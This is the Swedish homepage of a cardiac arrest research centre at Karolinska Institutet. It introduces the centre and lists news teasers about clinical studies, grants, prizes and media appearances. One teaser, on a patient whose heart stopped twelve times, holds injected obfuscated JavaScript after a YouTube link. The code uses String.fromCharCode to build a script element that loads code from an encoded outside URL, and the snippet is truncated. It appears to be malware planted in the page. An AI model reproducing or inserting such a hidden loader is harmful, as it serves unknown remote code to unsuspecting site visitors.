Välkommen till Centrum för Hjärtstoppsforskning!

Hjärtstopp utanför sjukhus drabbar årligen ca 2 000 individer inom Stockholmsregionen och 6000 på nationell basis. Endast ca 11% av dessa överlever. Intensiv forskning och utvecklingsarbete utfört av en forskargrupp vid Södersjukhuset och Karolinska Institutet har funnit att nya interventioner och utvecklingsprojekt inom området har stora potentialer att rädda liv, många liv.

Styrelsen för forskning vid Karolinska Institutet fann det därför viktigt att inrätta detta kunskapscentrum. Utgångspunkten för centret är att med kliniska och patientnära metoder öka överlevnaden vid hjärtstopp utanför sjukhus genom att etablera nya behandlingsmetoder, samt att på plats bistå den drabbade redan i bostaden, på arbetsplatsen, på offentliga platser eller i ambulans. Det sker genom både nya metoder och spetskompetens.


Gruppen är tvärprofessionellt sammansatt av läkare, sjuksköterskor, statistiker, och ekonomer. Ambitionen är även att ytterligare balansera gruppen ur ett genusperspektiv. Vidare finns en stark ambition att skapa åtta enskilda forskningsspår där ledare för dessa spår skall bestå av postdocs ur gruppen. Centret leds för närvarande av Jacob Hollenberg, Mårten Rosenqvist och Leif Svensson. Huvudansvarig för gruppen är sedan 1 januari 2015 Jacob Hollenberg.

Centrum för hjärtstoppsforskning vid Karolinska Institutet, Institutionen för Medicin, Solna och Södersjukhuset i Stockholm  arbetar med forskning inom hjärtstopp och hjärt-kärlsjukdomar.

Läs mer om oss här
About us in English here


Uppstart av ny banbrytande klinisk studie för ultratidig kylning vid hjärtstopp

Uppstart av ny banbrytande klinisk studie för ultratidig kylning vid hjärtstopp

Centrum för Hjärtstoppsforskning vid Karolinska Institutet planerar nu start av ny banbrytande klinisk studie för ultratidig kylning vid hjärtstopp Varje år drabbas ca 300 000 personer i Europa samt 350 000 i USA av hjärtstopp som sker utanför sjukhus. Dödligheten är hög och en stor andel av de som överlever har neurologiska men i efterförloppet. Forskare på Centrum för Hjärtstoppsforskning viLäs mer.
Jacob Hollenberg tilldelas Prins Daniels forskningsanslag till yngre lovande forskare

Jacob Hollenberg tilldelas Prins Daniels forskningsanslag till yngre lovande forskare

Jacob Hollenberg har i samband med ett symposium på Osccarsteatern i Stockholm den 17 Oktober tilldelats Hjärt-lungfondens och Prins Daniels forskningsanslag till yngre lovande forskare. Det var i samband med ett SCAPIS symposium för ca 1000 personer på anrika Oscarsteatern i Stockholm som Prins Daniel närvarade, delade ut anslaget och där Kristina Sparreljung - generalsekreterare för hjärtLäs mer.
No thumbnail available

Mitt hjärta stannade 12 gånger - Malou efter tio

https://www.youtube.com/watch?v=QuOlyc4IxBg Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58Läs mer.
No thumbnail available

Jacob Hollenberg i Sveriges Radio

Jacob Hollenberg, docent och biträdande överläkare samt chef för Hjärtstoppscentrum blev idag intervjuad av Sveriges Radio om behovet av tidig hjälp vid hjärtstopp, registrerade hjärtstartare och SMS-livräddarsystemet. Länkar till inslagen nedan. P1 morgon: https://sverigesradio.se/sida/artikel.aspx?programid=1650&artikel=7064786 EKOT: https://sverigesradio.se/sida/avsnitt/1161046?prLäs mer.
Miljonanslag från Vetenskapsrådet

Miljonanslag från Vetenskapsrådet

Centrum för Hjärtstoppsforskning har tilldelats forskningsanslag från Vetenskapsrådet för två studier 2017. Det är den randomiserade TANGO2 studien med frågeställningen om en förenklad hjärt-lungräddning med enbart bröstkompressioner kan ersätta standardbehandling med bröstkompressioner och inblåsningar. Studien har tilldelats ett anslag om totalt 7 milj kr fördelat på 4 år. Läs mer här om Läs mer.
Athenapriset 2017 till SMS Livräddare

Athenapriset 2017 till SMS Livräddare

Athenapriset 2017 med en prissumma på 150 000 kr har delats ut till Centrum för Hjärtstoppsforskning för SMS Livräddare. Det är Sveriges största pris för klinisk forskning. och bakom priset står Vinnova, Dagens Medicin, Forte, SKL LIF, Sweden Bio, Swedish Medtech och Vetenskapsrådet. Syftet är att belöna betydande prestationer inom klinisk forskning i Sverige. Prisutdelningen sker den 5 decemLäs mer.